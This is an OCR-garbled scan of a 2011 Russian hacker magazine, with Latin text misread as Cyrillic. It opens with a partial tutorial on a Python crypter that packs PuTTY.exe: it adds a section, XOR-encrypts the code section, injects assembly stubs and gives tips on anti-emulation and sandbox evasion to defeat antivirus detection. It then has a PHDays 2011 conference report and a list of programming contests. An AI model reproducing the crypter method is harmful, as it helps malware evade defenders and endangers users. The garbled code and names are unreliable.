нять функции лабораторной мыши. Чтобы сделать при- 
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Как работает рее 


При загрузке в рее экзэхи, библиотека сохраняет 
сам файл вре.__Ча{а__, а потом обрабатываетего и 
создает массив структур ре.__${гисигез__. Струк- 
тура — это объект, у которого есть адрес. Адрес, по 
которому она находится в файле, и есть набор полей. 
При сохранении файла ре.мг"е[ епате=»гези(. 
ехе») либа проходит по всем структурам и сохраняет 
их по указанным адресам. 

Чтобы что-то добавить, например, вту же секцию, 
нам сначала нужно найти адрес в памяти. Это можно 
посчитать так: адрес в памяти последней секции 

+ размер секции. Дальше заполняем все поля в 
структуре и добавляем ее в массив ре. _${гисигез__ 
Воти все :]. 


ятное Андрюшку :], мы, пожалуй, будем издеваться над 


РуКу.ехе. Упрощенно его структура будет выглядеть так: 


1. Служебные данные 

2. Первая кодовая секция 

3. Другие секции с данными 
Алгоритм криптора следующий. Создать две ассем- 
блерные программы. Первая будет косить под обычную 
прогу и проверять, что мы не в эмуляторе, а потом 
передаст управление на вторую программу. Вторая же 
восстановит оригинальную структуру файла и передаст 
управление на оригинальную точку входа РиЦу. И запи- 
сать эти программы в файл. 
В результате получится следующая структура: 


1. Служебные данные 
2. Первая кодовая секция 

2.1. Наша первая программа, которая 

передаст управление на 4.2 

2.2. Шифрованный код первой секции 
3. Другие секции с данными 
4. Добавленная секция 

4.1. Часть кодовой секции, 
перезаписанной программой 2.1 
Вторая программа, которая оригиналь- 
ный код из 4.1 поместит на 2.1, а 
потом расшифрует кодовую секцию и 
передаст на нее управление. 


4.2. 


[НТТР://ММИМ 


р ИпК$ 
® Репозиторий сиз- 


мененным рей[е`ом и 
написанным криптом 
ВИр://аиВуЬ.согп/ 

ргеэ!Чеп{иа/ЕхеРаскег 


® Оригинальная либа 
рее ВИр://соде. 
доод(е.согп/р/ре{е/ 

® Дока по Тогпадо\\/ер- 


шаблонизатору 
ВИ ://Лмллим/.когпад- 


омиеБ.ога/ 
® Гулза для анализа 


РЕ-файла, из которой 
можно брать много по- 
лезных функций 
Юр://соде.доод(е. 
согп/р/руем/ 


| 0У0 


› УЧ 

® На нашем диске 
найдешь исходники 
криптора и очень 
полезные доки как по 
самому формату РЕ- 
файла, так и потеории 
криптования. 

® На диске тебя ждет 
видео, в котором мы 
тестируем описанный 
в статье криптор 


Ее 


р по 
Хочешьузнать боль- 
ше? Для любителей 
Ру{Поп есть хорошая 
книга — «Сгау На 
Ру{оп». 


| МАВММ6_ 


› магпттод 


Помни, что информа- 
ция в статье представ- 
лена исключительно 

в образовательных це- 
лях. Веди себя хорошо 
и не думай, что мытебя 
кчему-нибудь этакому 
подстрекаем :]. 
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Приблизительная схема размещения структур 
криптора в файле 


В упрощенном виде, антивирус — это набор правил [сигнатур] и 


система, которая проверяет файл по этим правилам. 

К примеру, пусть в антивирусе будуттакие сигнатуры: 

® секция с кодом, записываемая +10; 

® после запуска прописывается в авторан +30; 

вторая секция с именем Гечц$ +30; 

® меньше 4 энтропия кодовой секции +20; 

® есть сертификат от майкрософта -10. 

Дальше антивирь проверяетте правила, которые возможно 
проверить без запуска ЕХЕ, потом в эмуляторе запускает файли 
проверяет все остальные правила. А после этого подсчитывает 
сумму, если она больше 100, значит вирус, если меньше — значит 
не вирус. 


Выпуск 4. Практический криптор 


Ну наконец-то мы добрались до сердца нашей статьи. Для рабо- 
ты криптора нам понадобится модуль рее [будем использовать 
несколько модифицированную версию}, и с помощью либы откро- 
ем РиЦу: 


1троге реЯ1е 
ре = рей1е.РЕ("ри*у .ехе") 


Теперь, если ты напишешь «ртп{ ре», то увидишь подробную инфу 
обо всех характеристиках файла, по этой инфе я советую искать 
нужные для изменения поля в файле. А о внутренней работе моду- 
ля обязательно прочитай во врезке. 

Теперь немного математики. У нас будут две программы, которые 
нужно внедрить в файл. Они будут занимать где-то по 512 байт 
каждая максимум. Поэтому для размещения добавим новую сек- 
цию в 1024 килобайт вызовом: 


ре. ааа _1а$*_5есЕ1оп($17е=1024) 


Закриптуем первую секцию ХОК`ом с ключом «1»: 


ре. ес*1оп$[0].хог_4афа(соае=1) 


Магия, правда? :]. А теперь прикинь, что все это пришлось бы 
писать на С++! 

Поскольку в начале программы будет наш код, то сохраним ориги- 
нальный код, скопировав его в последнюю секцию. Адрес первой 
секции в файле находится в переменной — ре.зес&1оп$[0]. 
Ро1пфегТоКамра*жа, а последней, соответственно — в 

ре. зес{1оп$[-1].Ро1пфегТоКамража: 


ре. Чафа_сору(ре.5зесЕ1оп$[9].Ро1пЕегТоКамража, 
ре.зес{1оп$[-1].Ро1п%егТоВам аа, 512) 


Оригинальный код сохранен, и мы приступим к написанию пер- 
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криптора 


Анти3Эмуляция 


Кроме избавления от внешних сигнатур, очень важно, чтобы 
антивирус в своем эмуляторе не добрался до исходного файла. 
Для этого нужна антиэмуляция. Раньше были очень популярны 
приемы, основанные на предположении, что эмулятор не понима- 
етвсе инструкции процессора. Сейчас же ситуация изменилась, 
и самые эффективные приемы основаны на использовании 
\ММЛпаом/5 АР!. Согласись, что антивирус вряд ли сможет эмулиро- 
вать все АР!. 

Воттебе такая идейка для реализации: 

® создаем \\Ипдо\м/5-приложение и один дополнительный поток; 

® после создания потока он должен послать через АР! сообщение 
основному потоку с каким-то ключом; 

® вглавной программе проверяем, и если ключ правильный — 
передаем управление на код расшифровки основного файла; 

® если код неправильный, то просто ничего не делаем и находим- 
ся в вечном цикле получения сообщений от \п4 ом. 


Р5: Никогда не останавливай программу с ошибкой, это лишь 
прибавит криптору лишний вес. Вечный цикл получения сообще- 
ний от \\ЛпЧом/5 — лучший способ. 


вой программы. Конечно же, писать мы ее будем на ассемблере, 
используя ЕАЗМ для компиляции. Создадим файлик раск{р[.азт с 
содержанием: 


и5е32 


то\у еах, {{ во }} 
тр еах 


Ты, наверное, уже догадался, что это не готовый исходник, это 
лишь шаблон для шаблонизатора из Тогпадо\\ев, а его мы уже 
отлично знаем, ведь именно его мы использовали при написании 
НТМЕ-морфера. Сгенерируем первую программу: 


азт = Тетр1а*е(ореп("расКк.{р1.азт", "г").геаа()).вепега{е( 
50=ре.ОРТТОМАЕ _НЕАОЕК .ТтадеВазе + 
ре. зес{1оп$[-1].\/1гфиа1Адаге$$+512, 


) 


итЕН ореп("расК.азт", "м") аз +: 
+.мг1е (азт) 
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ПИ ТЕТЕ чи 
яя" 
——- Нч . 


05.5Уу5фет(г"с: \Тазти\РАЗМ. ЕХЕ расК.а$т") 


В переменной до мы передаем адрес в памяти, где будет наша 
вторая программа — то есть, в последней секции, начиная с 512 
байта. А в последней строчке компилим результат на ЕАЗМ'е. 
Теперь запишем получившийся код в начало первой секции: 


пем_раск = ореп("раск.Б1п", "гЬ") .геаа() 
ре.Чафа_гер1асе (о+5еф=ре. ес 1оп$[9].Ро1пфегТоКамбажа, 
пем_Чафа=пем_раск) 


Вторую программу запишем в файл сору.{р(.азт. Размеру нее 
более внушительный, поэтому полный код смотри на диске. Там 
содержится два цикла, один скопирует 512 байт оригинальной про- 
граммы с последней секции в первую, а второй цикл расшифрует 
всю первую секцию. После этого передается управление на ориги- 
нальную программу. 

При компиляции темплейта нужно передать туда параметры для 
циклов копирования и расшифровки: 


сору_+1гот = ре.ОРТТОМАЕ_НЕАОЕВ . ТтагеВазечре. зес{1оп$ [-1]. \ 
\/1гЕца1Адаге$ 5 

сору_Фо = ре.ОРТТОМАЕ _НЕАОЕК .ТтаёеВазе+ре. зес&1оп$ [09]. \ 
\/1гЕца1Адаге$ 5 

оер = ре. ОРТТОМАЕ _НЕАОЕВ .ТтадеВазе+ре .ОРТТОМАЕ _НЕАПЕК. \ 
Адаге$$ОРЕп*гуРо1пт* 


азт = Тетр1Та*е (ореп("сору.р1.азт", "г").геаа()).вепегате ( 
сору_+гот=сору_№гот, 

сору_Фо=сору_То, 

сору_1еп=512, 

хог_1еп=ре. зес1оп$ [0] .М1$с_\1г{иа15$17е, 

Кеу_епсоае=1, 


0г151па1 _оер=оер, 


Остался маленький штришок — записать вторую прогу в файл и сде- 
лать первую секцию записываемой, чтобы расшифровщик не выдавал 
ошибок, а также установить точку входа на начало первой секции: 


пем_сору = ореп("сору.Б1п", "гЬ") .геаа() 
ре.Чафа_гер1асе (о+5еф=ре.5зес1оп$ [-1]. \ 


Ро1пфегТоКамрВа*а+512, пем_да*а=пем_сору) 
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_ Обход песочниц 


В крипторе нужно делать проверки на запуск в виртуальной 


машине, 5апаВох'е или анализаторе типа анубиса. Чтобы их зе- 
детектить, нужно провести небольшое исследование и написать 
программу, которая будет на экран выводить разные внутренние 
параметры системы, а дальше — проверить этот файл натом же 
анубисе и в скриншоте посмотреть параметры, которые показала 
наша прога. Дальше все просто — при запуске на системе с по- 
добными параметрами — просто уходим в цикл. 


НИИ ресурсов и импорта 


Для шифрования ресурсов мы должны пройтись по секции ре- 
сурсов и сохранить оттуда важные для запуска файла — иконки и 
манифест. Дальше создаем новые ресурсы с важными ресурсами, 
а остальное шифруем. После запуска криптора восстанавливаем 
все обратно. 

Несколько сложнее получается с импортом, ведь его также нужно 
сначала зашифровать, потом сгенерировать липовый импорт, 

но после восстановления импортеще нужно вручную проини- 
циализировать, то есть — загрузить ОЕ ки и сохранить втаблицу 
импорта реальные указатели на функции. 


ре. зес*1оп$[9].СПагас®ег1$%1с$ |= 

рея1е.5ЕСТТОМ СНАВАСТЕВТЗТТС$ [ "ТМАбЕ_$СМ_МЕМ МВТТЕ" ] 
ре.ОРТТОМАЕ _НЕАВЕК .Ад4ге$ $ОРЕптгуРо1пт* = 

ре. зес1оп$[9].\/1гЕиа1Аадге$ $ 
ре.мг1{е (АЯ1епате="гези1*.ехе") 


Выпуск 5. Завершающий 


Если собрать кусочки кода вместе, то будет у нас всего 50 строк. 
Всего лишь 50 — и криптор готов! 

А теперь прикинь, сколько строк содержала бы программа на С? 
Конечно, это еще далеко не готовый продукт, над ним нужно рабо- 
тать и работать. Чтобы довести систему до реального криптора, 
нужно добавить как минимум шифрование ресурсов и импорта, а 
также антиэмуляцию. О том как теоретически эти проблемы решить, 
смотри во врезках. Удачи! == 
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—РОЗТМЕ 
НАСК САУС 2011 


Отчетс международного форума по практической 
безопасности 


©19 мая прошло важное для российской индустрии ИБ мероприятие 
— международный форум Роз\уе НасК Вауз 2011, организованный, 
как легко догадаться, компанией Розе Тесппо(од!е$. Инсайдеры 
нашего журнала не упустили возможность проследить за результата- 
ми этого ивента и спешат поделиться с тобой впечатлениями. 


Первое упоминание о подготовке к РНО?2011 вскользь появилось в другу» и постоянно обновляющиеся списки участников, среди кото- 
твиттере Дмитрия Евтеева (@4е\ее\ - эксперта по информационной — рых представители США и Европы, начинает строить приблизитель- 
безопасности РТ и автора нашего журнала. Буквально за несколь- ную картину в сознании стороннего наблюдающего: «Позитивные 
ко недель до этого Дима абстрактно упоминал об идее подготовки технологии» замахнулись на то, чтобы провести конференцию, похо- 
события, которое должно было приблизить нашу индустрию инфор- жую по уровню если не на ОеТсоп и ВаскНа\, то, по крайней мере, 
мационной безопасности поближе к мировой арене. на НТВ. 

В конце марта появляется официальный сайт ‚ который 

приоткрывает завесу тайны над происходящим в застенках компа- Атмосфера 

нии процессом. Дерзкая миссия «объединить хакеров и компании Оказавшись на ресепшен клуба, где проходил ивент, сразу замеча- 


ИБ-индустрии, чтобы они смогли понять, насколько они нужны друг ешь масштаб конференции: просторные залы и помещения, плавно 
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Участники конкурса Сар!иге Ме Вад из Индии 


переходящие друг в друга, в плане оформления слегка 
отдают киберпанковской атмосферой. Кругом дисплеи 

и всевозможные гаджеты, на репите крутящие ролик 
РНО?2011, легкое техно, играющее в фоновом режиме. 
Однако, несмотря на размеры площади, понимаешь, 
почему Форум носит закрытый характер. Людям на том 
или ином докладе зачастую не хватало сидячих мест, а 
иногда и вовсе приходилось стоять на входе в помеще- 
ние. 

Программа Форума состояла из нескольких параллель- 
ных секций: 

1. мастер-классы; 

2. бизнес-семинары; 

3. технические семинары; 

4. конкурсная программа. 

Для меня наибольший интерес представляли первые три 
секции, поэтому приходилось разрываться между докла- 
дами. Помог заранее составленный план, в котором я 
для себя выделил несколько наиболее актуальных [на 
мой взгляд] направлений в индустрии. 

В перерывах между презентациями выступающих было 
интересно посмотреть на обновляющиеся в реальном 
времени результаты СТЕ. Команды из Европы, США и 
Китая «бились за монолит» [подробнее ознакомиться с 
легендой соревнования можно в блоге РТ: Би. у/8 50] 
или, как интерпретировал этот конкурс представитель 
средств массовой информации в лице одного из новост- 
ных телеканалов, «пытались украсть информацию про- 
тивника, и в то же время — защищали свою». В переры- 
вах между программой докладов, казалось бы, в режиме 
14$ 4 Гип проходили конкурсы «Взломай за 900 секунд», 
«1РВопе: взломай и уноси», «Ноутбук: взломай и уноси», 
однако методы и средства взлома подопытных девайсов 
в силу своей уникальности [чего только стоит 0-дау под 
баГаг!, продемонстрированный впервые в рамках кон- 
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курса] также не оставили СМИ без внимания. 
Неформальная обстановка, в которой находились участ- 
ники, как показывает опыт аналогичных международных 
конференций, отлично способствует обмену информа- 
цией, идеями, визитками. Здесь без всякого официоза 
можно пообщаться с сотрудниками любого ранга. За 
исключением высокопоставленных должностных лиц 
компании РозШме Тесппо!одез — темп, в котором им 
приходилось перемещаться и действовать во благо кон- 
ференции, заслуживает уважения и является примером 
«позитивной энергии». 


Доклады 


Доклад — это, пожалуй, основной вид подачи информа- 
ции на РНО2011. Даже некоторые (те, на которых я при- 
сутствовал] мастер-классы практически не отличались 
по своей форме от семинаров. Темы, которые поднима- 
лись в рамках мероприятия, не являлись чем-то прин- 
ципиально новым или инновационным, а скорее пред- 
ставляли аккумулированную информацию (иногда уже 
опубликованную в ранних работах] и структурированно 
поданную слушателю. 

Моей отправной точкой стал бизнес-семинар на тему 
«Безопасность в облаках». Интересно сформулиро- 
ванный топик обещал поведать о тонкостях безопас- 
ности, касающейся облачных технологий. Направление 
перспективное и, в силу относительной «свежести» в 
ИБ-индустрии, представляет собой непаханное поле для 
инновационных идей. 

Доклады, относящиеся к облачным технологиям, поми- 
мо «вкусного», с позиции бизнеса, описания предмета 
изложения содержали общую мысль: инсайд — главная 
угроза безопасности облачной инфраструктуры, а утечка 
через ее администратора — это самый дорогостоящий 
риск. Каждый третий слайд утверждал и подтверждал 
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Доклады на РНО не страдали от недостатка внимания 


данные факты. Зарубежный специалист, директор Р\/С Кристофер 
Гоулд, сформулировал причину отставания наших «облаков» от 
зарубежных: костью в горле внедрения облачной инфраструкту- 
ры в бизнес-процессы является ФЗ-152 (Федеральный закон «О 
персональных данных»). Теоретические абстракции, характерные 


для бизнес-презентаций, разбавил Сергей Гордейчик докладом на 
тему использования облака типа [аа5 пгазгисиге аз а бегисе] 

в тестах на проникновения. Были озвучены интересные варианты 
с наглядными примерами, в которых все расчеты берет на себя 
облако. 

Непривычно спуститься с облаков под землю, зарывшись с голо- 
вой в структуру |ред-формата, на техсеминаре Дмитрия Склярова, 
тема которого сформулирована следующим образом: «Уязвимости 
систем контроля подлинности цифровых фотографических при- 
ложений». Здесь интересно было узнать, как действовал ресерчер 
в процессе поиска уязвимостей, какие методы и средства исполь- 
зовал. А методы, кстати говоря, экзотические и иногда становится 
непонятно, как парни приходят к умозаключениям, преобразуя их 
в конечный результат. Например, меня поразила схема девайса, 
который «вымигивает» с помощью светодиода содержимое памяти 
фотоаппарата... 

Своеобразным отдыхом от исходных кодов и реализуемых ими 
криптопреобразований стал доклад Александра Гостева, ведущего 
антивирусного эксперта «Лаборатории Касперского», о развитии 
киберпреступности. Коллекция примеров крупнейших в истории 
хакерских атак, исчерпывающие факты об инциденте с Айроном 
Барном и группировкой «хактивистов» ТПе Апопуточц$ искушали 
бизнесовую аудиторию. Смирно дослушав информацию, которая 
собрана из открытых источников и подана в стиле свойственном 
трейлерам крупных блокбастеров, я перешел в секцию мастер- 
классов, а именно в Тогепэ!с-сектор, где Максим Суханов, предста- 
витель бгоир-[В, демонстрировал результаты реальных экспертиз, 
которые доводилось проводить компании. 

Центральной темой Форума была кибервойна, поэтому с моей сто- 


› 078 


роны было непозволительно пропускать доклады, которые содер- 
жали данный термин в своих заголовках, к тому же не хотелось 
пропустить выступление директора РТ Юрия Максимова и просле- 
дить за его подачей. «Кибервойна. Мы их или они нас?» — топик, 
оставленный организаторами на закуску и отданный на растерза- 
ние представителям бизнес-семинаров. 

«Война» в привычном понимании этого термина, как конфликт 
двух сторон с элементами вооруженной борьбы, уже отходит на 
второй план. Поле боя переносится в кибер-пространство, тактика 
и стратегия здесь имеют свою специфику. Таким образом, США 
уже давно отказались от понятия «цели», как объекта физического 
мира, а заменили ее понятием «боевая платформа» для ведения 
боевых действий в определенной среде. Стратегические и такти- 
ческие операции строятся на так называемых «расчетах эффек- 
тов». Победить в информационной войне может тот, кто умеет 
рассчитывать эффекты большего порядка. Например, рассмотрим 
такое диверсионное действие, как взрыв моста. Его уничтожение 
способно поразить транспортную систему противника и тем самым 
осложнить процесс его перемещения в ходе военных действий. Это 
первый порядок. Мост — стратегический объект, который требуется 
оппоненту для транспортировки оружия и боеприпасов. Его устра- 
нение значительно усложнит задачу транспортировки — это эффект 
второго порядка. Если во время взрыва по этому мосту будет про- 
езжать командир роты, который вследствие расчета психологиче- 


ского портрета имеет все предпосылки стать командиром дивизии, 
то его устранение во время взрыва уже будет являться эффектом 
третьего порядка. Вот так вот на основе расчета эффектов строятся 
военные действия на информационном поле. Фактически, хакеры 
— это теперь не только компьютерные специалисты, в привычном 
понимании данного определения, но и психологи, которые способ- 
ны рассчитывать перспективу развития боевых действий. 

Однако тема топика содержала в себе, на мой взгляд, не ритори- 
ческий вопрос «Мы их или они нас”». Как оказалась, конкретный 
ответ на него содержали не сами доклады, а результат соревнова- 
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Судя по крутым очкам, у чувака большой потенциал 
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Никита Тараканов демонстрирует свежий Одау в своем 
мастер-классе 


ния СТЕ: его выиграла команда РРР из США. В общем, в этот раз 
получилось так, что «они нас» :). 


За кулисами 


В очередной раз у меня появляется возможность задать вопросы 
одному из непосредственных организаторов РНО2011, гуру СТЕ`ов 
и НаскКЧиезГ ов, эксперту по информационной безопасности компа- 
нии РозШме Тесппо©9!ез — Дмитрию Евтееву. 


Денис Макрушин [М]: Расскажи, как родилась легенда СТЕ? Где черпали 
вдохновение в процессе подготовки сценария? 

Дмитрий Евтеев [Е]: Легенда полностью придумана Сергеем Гордейчи- 
ком (технический директор РТ — прим. ред.), потому что придумывать 
такие сценарии, подобные полноценным книжным сюжетам, у нас мало 
кто способен. Разработчики вносили свои корректировки. 

[М]: А сколько людей участвовали в разработке СТЕ и сколько времени на 
это потрачено? 

[Е]: Приблизительно треть компании принимало участие в разработке. У 
нас сейчас работает порядка 150 человек, поэтому 50 человек около двух 
месяцев готовили конкурс. 

[М]: В качестветемы РНО 2011 вобщеми соревнований в частности 
выбрана кибервойна. Почему именно ее выбрали в качестве основного 
объекта исследования? 

[Е]: Напервоначальной стадииу нас была совершенно другая идеяи, 
соответственно, вытекающая из нее тема конкурсов, которую, кстати 
говоря, мы сейчас прорабатываем и в которой планируем задействовать 
не только зону СТЕ, но итех участников конференции, которые находятся 
в зоне семинаров и слушают доклады. 

[М]: Какой «выхлоп» ожидался от организации данного мероприятия: 
рейтинг, косвенный или прямой финансовый поток? 

[Е]: Мы организовали мероприятие, результат которого далеко перева- 
лил за уровень наших ожиданий, представляющих собой исключительно 
энтузиазм. Форум готовился |и${ 4 Тип, и побочные результаты (в виде 
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Госк ркКта — модное в ИБ-среде увлечение, связан- 
ное со взломом хардварных замков. Ни одна крупная 
конфа не проходит без парней с набором отмычек. 


поднятия рейтинга) также не прогнозировались. 

[М]: В заключительной части бизнес-семинаров натему «Кибервойна. Мы 
их или они нас?» ведущим был заявлен Юрий Максимов. Личноя ждалего 
выступление, так как было интересно, что же скажет генеральный дирек- 
тор компании РТ, ия хотел понаблюдать за его подачей материала. Однако 
онне появился, и Сергей Гордейчик выполнял роль генерального спикера. 
С чем это связано? 

[Е]: Юрий просто был занят в этот день. Честно говоря, мало кто ожидал, 
что маленькая компания способна на подготовку мероприятия такого 
формата и такого уровня. Включая директора. 

[М]: Пожалуй, конкурс СТЕ дал ответ на вопрос «Мы их или они нас?». Как 
ты прокомментируешь победу команды из США? 

[Е]: Ребята из РРР просто с самого начала выбрали правильную страте- 
гию: не отвлекались на дополнительные задания, в отличие отостальных 
команд, которые в погоне за бонусами просто теряли из фокуса основ- 
ную задачу. 

[М]: Название Форума подразумевает несколько позитивных дней 

(Роз \№е Наск Бауз). Что нам стоит ждать в будущем году? Или может быть 
позитивные дни будут распределены втечение года? 

[Е]: Мы уже сейчас начинаем подготовку к РНО 2012 и рассчитываем на 
программу нескольких дней врежиме «поп-Зор». 


Выход из темноты 


Конференция Роме Наск Пауз несомненно обеспечила инду- 
стрию инфобеза стимулом для дальнейшего развития в различ- 
ных векторах: организация мероприятий, участие в конкурсах по 
практической безопасности, увеличение качества и количества 
докладов, поиск уязвимостей в продуктах. Странно, мы смотрим за 
рубеж, как в окно смотрит заключенный периметра четырех стен, 
и восхищаемся уровнем забугорных конференций. «Позитивные» 
сделали попытку выбраться за этот периметр. Только выходя из 
зоны своего комфорта, мы приобретаем ценный опыт. == 
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Ш м Мария «МИг(» Нефедова (тИгЦИ@геа(.хаКер.ги) 


ЧЕМПИОНАТЫ 


ПО ПРОГРАММИРОВАНИЮ 


ИНЕ ТОЛЬКО 


Ломать, программировать и получать деньги? 


Легко! 


©Рассказывая о конференциях, форумах, съездах и лан-пати, 
нельзя обделить вниманием хакерские и программерские 
чемпионаты и контесты. А ведь их немало, за призовые места там 
платят неплохие деньги, да и в целом участие в подобных 
мероприятиях — это очень полезный опыт. 


АСМ |СРС 


Когда: 

Регистрация команд заканчивается в сентябре 
Четвертьфинал проходит в октябре 

Полуфинал в ноябре 

Финал в январе—марте 

де: 

Каждый год финал проходит в разных странах 
Сайт: 

сгп.Бауогеди/ме(сотпе.1срс 


Наш список открывает Международная студенческая олимпиада по 
программированию [в английском принято сокращение АСМЛСРС 
или просто 1СРС] — крупнейшая студенческая командная олимпиа- 
да по программированию в мире. О данном ивенте мы уже писали 
неоднократно, но позволим себе повториться. История конкурса 
уходит корнями в далекие "0-е годы. Во всем мире это состязание 
считается весьма престижным, ведь, по сути, данный чемпионат 
проводится среди молодой программистской элиты. Крупные ком- 
пании каждый год внимательно следят за АСМ |СРС, присматривая 
будущие кадры, ведь один из основных ресурсов П-индустрии, это 
мозги. 

Чемпионат проводится под эгидой ассоциации вычислительной тех- 
ники (АСМ). Начиная с 1989 года, организацией соревнований зани- 
мается университет Бэйлора. В разное время спонсорами сорев- 
нований становились такие компании, как Арр(е, АТ&Т и Мисго$ой, 
однако с 1997 года по настоящее время генеральным спонсором 
является компания 1ВМ. 

Россия впервые получила право на организацию полуфинальной 
Северо-Восточной Европейской группы в сезоне 1996-1997, и стех 
пор команды наших вузов не раз завоевывали на чемпионате при- 
зовые места. Правила чемпионата таковы: к участию допускаются 
студенты высших учебных заведений, а также аспиранты перво- 

го года обучения. Студенты, дважды участвовавшие в финальной 
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стадии олимпиады, или пятикратно принимавшие участие в регио- 
нальном отборе, не допускаются к участию. В каждой команде три 
человека, на троих у них один компьютер. Командам дается пять 
часов времени и от восьми до двенадцати задач. Заметим, что от 
уровня сложности этих задач у любого программиста средней руки 
попросту вскипит мозг :]. Побеждает та команда, которая решит 
наибольшее число задач, затратив на это меньше всего времени. 
Решения участники пишут на С, С++ или ]ауа и отправляют на 
тестирующий сервер. Какие именно тесты там крутятся, участники 
не знают, а задачу недостаточно просто решить правильно - нужно 
еще уложиться в определенные ограничения по времени, памяти и 
т.д. Каждая неудачная попытка решения — плюс двадцать минут к 
штрафному времени команды (которое изначально равняется нулю}, 
так что пытаться и пытаться до победного не выйдет. С денежными 
наградами на чемпионате дело обстоит следующим образом: 
Команда-победитель [СРС получает $12 000. Команды, получившие 
золотые медали, получают по $6 000. Команды, получившие сере- 
бряные медали, получают по $3 000.Команды, получившие «бронзу», 
получают по $1 500. Кстати, в этом году представитель 1ВМ Марк 
Гуэйн сообщил: «Команда-победитель 1СРС получит 12 тысяч дол- 
ларов в качестве приза от спонсора турнира, компании 1ВМ, а всем 
членам команд, завоевавшим золото, будет предложена работа в 
компании». Так что, деньги здесь даже не главное. 


Гасебоск НасКег Сир 

Когда: 

Предположительно декабрь-январь 
Где: 

В онлайне 

Сайт: 

Гасероок.согп/басКегсир 


В этом году одна из крупнейших социальных сетей планеты 
(Гасебоок] объявила об учреждении ежегодного конкурса по алгорит- 
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мическому программированию для хакеров со всего мира. Конкурс 
так и называется — Гасебоок НаскКег Счр. 

Первый «хакерский кубок» [2011 года}, к сожалению, уже прошел. 
Регистрация на соревнование была открыта с 20 декабря 2010 года 
по 10 января 2011 года. Сам конкурс проходит в онлайне. Суть же 
соревнования такова: состязание делится на три этапа. Первый — 
квалификационный раунд, длившийся с 7 января 2011 года [в 0:00 
ОТС] по 10 января 2011 года [в 0:00 ОТС). Участникам предложили 
три задачи, и чтобы пройти в следующий раунд, необходимо было 

в течение 72 часов решить хотя бы одну из них. Те, кто справился 

с заданием, были допущены к первому онлайновому раунду, кото- 
рый состоялся 15-16 января [3 подраунда по 3 часа в разное время 
суток). Из каждого подраунда была отобрана 1000 лучших участников. 
Второй и заключительный онлайновый раунд прошел 22 января (с 
15:00 по 18:00 ОТС). В ходе финала были определены 300 лучших 
хакеров (получившие по официальной футболке НаскКег Сир} и 25 
самых лучших. Победители из числа 25 лучших могут рассчитывать 
на призы посерьезнее сувенирных маек: Расероок платит $5000 

за первое место, $2000 за второе, $1000 за третье и утешительные 
$100 за места с 4-го по 25-е. Суммы, конечно, не заоблачные, но в 
будущем они, вероятно, возрастут, да и к деньгам прилагаются бес- 
платные билеты в Калифорнию и бесплатное проживание в кампусе 
Гасебоок в Пало-Альто. Кстати, в первом Гасебоок НаскКег Сир побе- 
дил россиянин Петр Митричев, завсегдатай подобных соревнований. 


Тор Содег 

Когда: 

25—28 сентября 2011 

[де: 

В онлайне и различных городах США. Финал Тор Содег 2011 состо- 
ится в Форт-Лодердейл, штат Флорида. 

Сайт: 

{орсодегсогп и согпппипНу.{орсодегсогаДАсо1 1/ 


Широко известны во всем мире программерские состязания, про- 
водимые компанией ТорСодег [пс. Часть соревнований проходит в 
Сети с частотой несколько раз в месяц (в зависимости от формата}, 
но проводятся также и ежегодные турниры — Тор Содег Ореп и Тор 
Содег СоЦеда{е СваЦепде (для студентов] с очным финалом и вну- 
шительными призовыми фондами. С 2007 года учрежден также и Тор 
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Содег Нав ЭсвВоо[ Тоигпагтег\, то есть турнир для школьников. 
Соревнования Тор Содег интересны тем, что здесь существует 
система рейтинга. Дело в том, что все соревнования здесь индиви- 
дуальные и каждое участие в онлайновом турнире влияет на рейтинг 
участника в этом виде соревнований, что существенно повышает 
интерес и способствует появлению азарта. Рейтинг был придуман 
компанией ТорСодег |пс и по его образу и подобию позже были 
созданы Тез Те Вез{ и российский СодеЮюгсез. Но вернемся к Тор 
Содег Ореп [ранее Тор Содег |пуКаНопа(. Это ежегодный индивиду- 
альный профессиональный турнир по программированию, который 
негласно считается чем-то вроде чемпионата мира среди профи. И, 
в общем, заслуженно считается — это действительно один из круп- 
нейших ивентов такого рода, на котором собираются сильнейшие, 
хотя попытать свои силы может любой, кому больше 18 лет. В целом 
сообщество Тор Содег насчитывает почти 300 000 человек. Конкурс 
проводится по системе ТорСодег с 2001 года и включает в себя 
следующие виды соревнований: А!дог(бт, Шезюп, Оемеортег\и, 
Мага{оп, АгсАКесиге, АззегпЬУ, ТезИпа, Вид Касез и Зи9!о. 
Суммарный призовой фонд Тор Содег Ореп 2011 составляет $150 000 
и 100 поездок в Форт-Лодердейл [в зависимости от категории сорев- 
нований — либо для участия в финале, либо просто как наблюда- 
тель]. Наиболее популярным из состязаний является АдогИНит, приз 
за первое место в этом формате составляет $15 000. Кстати, раньше 
деньги получали и победители регулярных онлайновых состязаний, 
но потом организаторы отказались от этой затеи. Советуем посетить 
официальный сайт компании и турнира, где можно ознакомиться с 
подробностями как общего характера, так и частного — по разным 
видам состязаний. 


боод(е Соде Лат 

Когда: 

6 мая—29 июля 2011 

Где: 

В онлайне. Финал очный, в 2011 году состоится в офисе бооде в 
Токио 

Сайт: 

соде.доо4(е.сопп/соде]ат 


Еще один популярный, уважаемый и довольно старый турнир — 
Сооще Соде ]ат. Как нетрудно догадаться, проводит данное сорев- 
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25 лучших — финалисты Расебоок НасКег Сир 2011 


нование компания СбооЧ(е, история ивента ведется с 2003 года. 
Соод(е Соде ]Дат — соревнование международное, и помимо про- 
чего оно используется как средство для выявления лучших умов 
для возможной работы в боодЕ. Да-да, выше уже было сказано 

о том, что основа и главный ресурс !Т-бизнеса, это мозги, так что 
— ничего удивительного. Суть состязания довольно проста: есть 
набор алгоритмических задач, которые должны быть решены за 
фиксированное время. Что приятно, в отличие от большинства ана- 
логичных соревнований по программированию, участники боод(е 
Соде ат могут использовать для решения задач любой язык про- 
граммирования и среду разработки по своему усмотрению. 

Чтобы принять в турнире участие, нужно иметь боод(е-аккаунт, 
зарегистрироваться на сайте соревнования и принять участие в 
квалификационном раунде. Увы, в этом году отбор уже закончен. 
Ситуация с призами у боод(е напоминает Гасебоок Наскег Счр: 
первое место — $10 000, второе место — $2000, третье место — 
$1000. Места с 4 по 25 оплачиваются символическим призом в 
$100. 


бооц(е А! СпаЦепде 
Где: 

В онлайне 

Сайт: 

а!-соп{е${. сот 


Университет Ватерлоо при поддержке компании боод(е пред- 
лагает всем желающим (и умеющим] принять участие в довольно 
необычном состязании. Скооперировавшись, они организовали 
настоящие войны роботов. В основу конкурса легла игра ба(соп 
— стратегия в режиме реального времени. Игра, в общем-то, про- 
ста: имеется двухмерная карта с планетами, каждая из которых 
